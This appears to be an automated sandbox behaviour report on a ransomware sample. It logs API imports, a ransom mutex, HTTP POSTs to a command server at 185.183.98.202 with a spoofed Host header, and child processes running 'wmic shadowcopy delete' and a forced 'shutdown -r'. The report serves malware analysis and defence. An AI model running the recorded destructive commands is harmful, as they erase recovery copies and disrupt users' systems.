Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x75fedd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDiskFreeSpaceW, address_out = 0x75fff7aa	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetWindowsDirectoryW, address_out = 0x75fe43e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x75ffc860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75fe49d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75fe5235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75fe11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x75ffc807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75fe3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x75fe3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x75ffd5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75fe1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7600828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75fe1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitThread, address_out = 0x77e8d598	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75fe3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75fe4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75fe1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75fe34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76002a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75fe1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75fe186e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75fe1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75fe1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75fe1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75fe14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75fe14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77e5e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75fe5a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75fe7a10	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x7640ae5f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxA, address_out = 0x7644fd1e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfW, address_out = 0x7641e061	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperBuffW, address_out = 0x763ffc5d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x760f412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x760f469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptExportKey, address_out = 0x760e91ea	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x760edf14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetKeyParam, address_out = 0x761077cb	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x760ee124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x760ec532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7610779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGenKey, address_out = 0x760e8ee9	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x760ec51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x760f157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x760f46ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x760f468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x760f40e6	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderPathW, address_out = 0x76940468	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76933c71	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x75a95d77	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptBinaryToStringA, address_out = 0x75a9a8c5	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7658ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpAddRequestHeadersW, address_out = 0x76594fae	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestW, address_out = 0x7659ba12	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectW, address_out = 0x7659492c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestW, address_out = 0x76594a42	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x76599197	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x7658b406	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlComputeCrc32, address_out = 0x77eeffc1	6	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGenRandom, address_out = 0x760edfc8	938	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CheckTokenMembership, address_out = 0x760edf04	1	Fn

System (14)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = XDUWTFONO	1	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Sleep	duration = -1 (infinite)	1	Fn
Get Time	type = Ticks, time = 102352	1	Fn
Get Time	type = Ticks, time = 112117	1	Fn
Get Time	type = Ticks, time = 113865	1	Fn
Get Time	type = Ticks, time = 133911	2	Fn
Get Time	type = Ticks, time = 133926	1	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	3	Fn
Get Info	type = Hardware Information	1	Fn
Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = Global\pc_group=WORKGROUP&ransom_id=e65fbbbf9c354b42		1	Fn

Network Behavior

HTTP Sessions (3)

Information	Value
Total Data Sent	859 bytes
Total Data Received	565 bytes
Contacted Host Count	2
Contacted Hosts	ipv4bot.whatismyipaddress.com, 185.183.98.202

HTTP Session #1

Information	Value
User Agent	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name	ipv4bot.whatismyipaddress.com
Server Port	80
Data Sent	295
Data Received	13

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Add HTTP Request Headers	headers = Host: ahnlab.com	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/	1	Fn
Read Response	size = 10238, size_out = 13	1	Fn Data
Read Response	size = 10238, size_out = 0	1	Fn
Close Session	-	6	Fn

HTTP Session #2

Information	Value
User Agent	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name	185.183.98.202
Server Port	80
Data Sent	290
Data Received	552

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 185.183.98.202, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.1, target_resource = eighpheighge?eaph=iezaau, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Add HTTP Request Headers	headers = Host: ahnlab.com	1	Fn
Send HTTP Request	headers = Content-Type: application/x-www-form-urlencoded, url = 185.183.98.202/eighpheighge?eaph=iezaau	1	Fn Data
Read Response	size = 204798, size_out = 552	1	Fn Data
Read Response	size = 204798, size_out = 0	1	Fn
Close Session	-	6	Fn

HTTP Session #3

Information	Value
User Agent	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name	185.183.98.202
Server Port	80
Data Sent	274
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 185.183.98.202, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.1, target_resource = sceighea, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Add HTTP Request Headers	headers = Host: ahnlab.com	1	Fn
Send HTTP Request	headers = Content-Type: application/x-www-form-urlencoded, url = 185.183.98.202/sceighea	1	Fn Data
Read Response	size = 204798, size_out = 0	1	Fn
Close Session	-	6	Fn

Process #9: wmic.exe

Information	Value
ID	#9
File Name	c:\windows\syswow64\wbem\wmic.exe
Command Line	"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory	C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor	Start Time: 00:01:12, Reason: Child Process
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:09:15

OS Process Information

Information	Value
PID	0xb78
Parent PID	0xa88 (c:\windows\syswow64\svchost.exe)
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x B7C 0x BA8 0x BC0 0x BC8 0x BCC 0x BD0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	Readable	-
locale.nls	0x000b0000	0x00116fff	Memory Mapped File	Readable	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	Readable, Writable	-
wmic.exe.mui	0x00130000	0x0013ffff	Memory Mapped File	Readable, Writable	-
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	-
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	Readable, Writable	-
private_0x0000000000190000	0x00190000	0x00190fff	Private Memory	Readable, Writable	-
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000001b0000	0x001b0000	0x001b0fff	Pagefile Backed Memory	Readable	-
msxml3r.dll	0x001c0000	0x001c0fff	Memory Mapped File	Readable	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	Readable	-
private_0x00000000001e0000	0x001e0000	0x0021ffff	Private Memory	Readable, Writable	-
private_0x0000000000220000	0x00220000	0x0027ffff	Private Memory	Readable, Writable	-
private_0x0000000000220000	0x00220000	0x0023ffff	Private Memory	-	-
private_0x0000000000240000	0x00240000	0x0027ffff	Private Memory	Readable, Writable	-
windowsshell.manifest	0x00280000	0x00280fff	Memory Mapped File	Readable	-
pagefile_0x0000000000280000	0x00280000	0x00280fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000290000	0x00290000	0x00291fff	Pagefile Backed Memory	Readable	-
index.dat	0x002a0000	0x002a7fff	Memory Mapped File	Readable, Writable	-
private_0x00000000002b0000	0x002b0000	0x0032ffff	Private Memory	Readable, Writable	-
private_0x0000000000330000	0x00330000	0x0041ffff	Private Memory	Readable, Writable	-
private_0x0000000000330000	0x00330000	0x0038ffff	Private Memory	Readable, Writable	-
index.dat	0x00330000	0x00343fff	Memory Mapped File	Readable, Writable	-
private_0x0000000000350000	0x00350000	0x0038ffff	Private Memory	Readable, Writable	-
index.dat	0x00390000	0x0039ffff	Memory Mapped File	Readable, Writable	-
rsaenh.dll	0x003a0000	0x003dbfff	Memory Mapped File	Readable	-
pagefile_0x00000000003a0000	0x003a0000	0x003a0fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000003b0000	0x003b0000	0x003bcfff	Pagefile Backed Memory	Readable, Writable	-
wmiutils.dll.mui	0x003b0000	0x003b4fff	Memory Mapped File	Readable, Writable	-
private_0x00000000003e0000	0x003e0000	0x0041ffff	Private Memory	Readable, Writable	-
private_0x0000000000450000	0x00450000	0x0054ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000550000	0x00550000	0x006d7fff	Pagefile Backed Memory	Readable	-
private_0x0000000000700000	0x00700000	0x0070ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000710000	0x00710000	0x00890fff	Pagefile Backed Memory	Readable	-
private_0x00000000008b0000	0x008b0000	0x008effff	Private Memory	Readable, Writable	-
sortdefault.nls	0x008f0000	0x00bbefff	Memory Mapped File	Readable	-
private_0x0000000000bc0000	0x00bc0000	0x00d4ffff	Private Memory	Readable, Writable	-
kernelbase.dll.mui	0x00bc0000	0x00c7ffff	Memory Mapped File	Readable, Writable	-
private_0x0000000000cd0000	0x00cd0000	0x00d0ffff	Private Memory	Readable, Writable	-
private_0x0000000000d10000	0x00d10000	0x00d4ffff	Private Memory	Readable, Writable	-
private_0x0000000000d50000	0x00d50000	0x00e4ffff	Private Memory	Readable, Writable	-
private_0x0000000000ea0000	0x00ea0000	0x00eaffff	Private Memory	Readable, Writable	-
wmic.exe	0x00eb0000	0x00f12fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000f20000	0x00f20000	0x0231ffff	Pagefile Backed Memory	Readable	-
private_0x0000000002320000	0x02320000	0x0254ffff	Private Memory	Readable, Writable	-
private_0x0000000002320000	0x02320000	0x0248ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002320000	0x02320000	0x023fefff	Pagefile Backed Memory	Readable	-
private_0x0000000002400000	0x02400000	0x0243ffff	Private Memory	Readable, Writable	-
private_0x0000000002450000	0x02450000	0x0248ffff	Private Memory	Readable, Writable	-
private_0x0000000002490000	0x02490000	0x024cffff	Private Memory	Readable, Writable	-
private_0x0000000002510000	0x02510000	0x0254ffff	Private Memory	Readable, Writable	-
private_0x0000000002550000	0x02550000	0x0294ffff	Private Memory	Readable, Writable	-
private_0x0000000002950000	0x02950000	0x02b1ffff	Private Memory	Readable, Writable	-
private_0x0000000002960000	0x02960000	0x0299ffff	Private Memory	Readable, Writable	-
private_0x0000000002a20000	0x02a20000	0x02a5ffff	Private Memory	Readable, Writable	-
private_0x0000000002a60000	0x02a60000	0x02a9ffff	Private Memory	Readable, Writable	-
private_0x0000000002aa0000	0x02aa0000	0x02adffff	Private Memory	Readable, Writable	-
private_0x0000000002ae0000	0x02ae0000	0x02b1ffff	Private Memory	Readable, Writable	-
private_0x0000000002b20000	0x02b20000	0x02d3ffff	Private Memory	Readable, Writable	-
private_0x0000000002b40000	0x02b40000	0x02b7ffff	Private Memory	Readable, Writable	-
private_0x0000000002d00000	0x02d00000	0x02d3ffff	Private Memory	Readable, Writable	-
msoxmlmf.dll	0x71890000	0x7189cfff	Memory Mapped File	Readable, Writable, Executable	-
wtsapi32.dll	0x718b0000	0x718bcfff	Memory Mapped File	Readable, Writable, Executable	-
framedynos.dll	0x718c0000	0x718f4fff	Memory Mapped File	Readable, Writable, Executable	-
fastprox.dll	0x71de0000	0x71e75fff	Memory Mapped File	Readable, Writable, Executable	-
ntdsapi.dll	0x72f60000	0x72f77fff	Memory Mapped File	Readable, Writable, Executable	-
wmiutils.dll	0x72f80000	0x72f96fff	Memory Mapped File	Readable, Writable, Executable	-
wbemsvc.dll	0x74380000	0x7438efff	Memory Mapped File	Readable, Writable, Executable	-
secur32.dll	0x74610000	0x74617fff	Memory Mapped File	Readable, Writable, Executable	-
msvcr90.dll	0x746e0000	0x74782fff	Memory Mapped File	Readable, Writable, Executable	-
rpcrtremote.dll	0x74f60000	0x74f6dfff	Memory Mapped File	Readable, Writable, Executable	-
rsaenh.dll	0x74f70000	0x74faafff	Memory Mapped File	Readable, Writable, Executable	-
cryptsp.dll	0x74fb0000	0x74fc5fff	Memory Mapped File	Readable, Writable, Executable	-
iphlpapi.dll	0x75040000	0x7505bfff	Memory Mapped File	Readable, Writable, Executable	-
comctl32.dll	0x75060000	0x751fdfff	Memory Mapped File	Readable, Writable, Executable	-
wbemprox.dll	0x75240000	0x75249fff	Memory Mapped File	Readable, Writable, Executable	-
wbemcomn.dll	0x75250000	0x752abfff	Memory Mapped File	Readable, Writable, Executable	-
msxml3.dll	0x75420000	0x75552fff	Memory Mapped File	Readable, Writable, Executable	-
winnsi.dll	0x755b0000	0x755b6fff	Memory Mapped File	Readable, Writable, Executable	-
dnsapi.dll	0x755c0000	0x75603fff	Memory Mapped File	Readable, Writable, Executable	-
profapi.dll	0x75610000	0x7561afff	Memory Mapped File	Readable, Writable, Executable	-
uxtheme.dll	0x75640000	0x756bffff	Memory Mapped File	Readable, Writable, Executable	-
wow64cpu.dll	0x756d0000	0x756d7fff	Memory Mapped File	Readable, Writable, Executable	-
wow64win.dll	0x756e0000	0x7573bfff	Memory Mapped File	Readable, Writable, Executable	-
wow64.dll	0x75740000	0x7577efff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x75980000	0x7598bfff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x75990000	0x759effff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x75a30000	0x75a48fff	Memory Mapped File	Readable, Writable, Executable	-
nsi.dll	0x75a50000	0x75a55fff	Memory Mapped File	Readable, Writable, Executable	-
crypt32.dll	0x75a60000	0x75b7cfff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x75bb0000	0x75bf5fff	Memory Mapped File	Readable, Writable, Executable	-
iertutil.dll	0x75dd0000	0x75fcafff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x75fd0000	0x760dffff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x760e0000	0x7617ffff	Memory Mapped File	Readable, Writable, Executable	-
shlwapi.dll	0x76180000	0x761d6fff	Memory Mapped File	Readable, Writable, Executable	-
urlmon.dll	0x76240000	0x76375fff	Memory Mapped File	Readable, Writable, Executable	-
ws2_32.dll	0x76380000	0x763b4fff	Memory Mapped File	Readable, Writable, Executable	-
lpk.dll	0x763c0000	0x763c9fff	Memory Mapped File	Readable, Writable, Executable	-
msasn1.dll	0x763d0000	0x763dbfff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x763e0000	0x764dffff	Memory Mapped File	Readable, Writable, Executable	-
oleaut32.dll	0x764e0000	0x7656efff	Memory Mapped File	Readable, Writable, Executable	-
wininet.dll	0x76570000	0x76664fff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x76670000	0x7671bfff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x76720000	0x767ebfff	Memory Mapped File	Readable, Writable, Executable	-
clbcatq.dll	0x76890000	0x76912fff	Memory Mapped File	Readable, Writable, Executable	-
shell32.dll	0x76920000	0x77569fff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x77570000	0x775cffff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x775d0000	0x776bffff	Memory Mapped File	Readable, Writable, Executable	-
ole32.dll	0x776c0000	0x7781bfff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x77820000	0x778affff	Memory Mapped File	Readable, Writable, Executable	-
usp10.dll	0x77990000	0x77a2cfff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000077a30000	0x77a30000	0x77b4efff	Private Memory	Readable, Writable, Executable	-
private_0x0000000077b50000	0x77b50000	0x77c49fff	Private Memory	Readable, Writable, Executable	-
ntdll.dll	0x77c50000	0x77df8fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x77e30000	0x77faffff	Memory Mapped File	Readable, Writable, Executable	-
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	-
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	-

Host Behavior

COM (6)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	F6D90F12-9C73-11D3-B32E-00C04F990BB4	2933BF95-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	EB87E1BD-3233-11D2-AEC9-00C04FB68820	EB87E1BC-3233-11D2-AEC9-00C04FB68820	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli\ms_409	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = \\XDUWTFONO\ROOT\CIMV2	1	Fn

Registry (5)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging, data = 48	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory, data = 37	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Log File Max Size, data = 54	1	Fn

Module (3)

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\system32\kernel32.dll	base_address = 0x75fd0000	1	Fn
Get Handle	c:\windows\syswow64\wbem\wmic.exe	base_address = 0xeb0000	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ffa84f	1	Fn

System (6)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = XDUWTFONO	1	Fn
Get Time	type = System Time, time = 2018-04-24 10:31:25 (UTC)	1	Fn
Get Time	type = Ticks, time = 134753	1	Fn
Get Time	type = Local Time, time = 2018-04-24 20:31:25 (Local Time)	1	Fn
Get Info	type = System Directory, result_out = C:\Windows\system32	2	Fn

Process #10: cmd.exe

Information	Value
ID	#10
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c shutdown -r -t 1 -f
Initial Working Directory	C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor	Start Time: 00:01:12, Reason: Child Process
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:09:15

OS Process Information

Information	Value
PID	0xb90
Parent PID	0xa88 (c:\windows\syswow64\svchost.exe)
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x B94

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000070000	0x00070000	0x00071fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000080000	0x00080000	0x00080fff	Private Memory	Readable, Writable	-
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	Readable, Writable	-
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	Readable	-
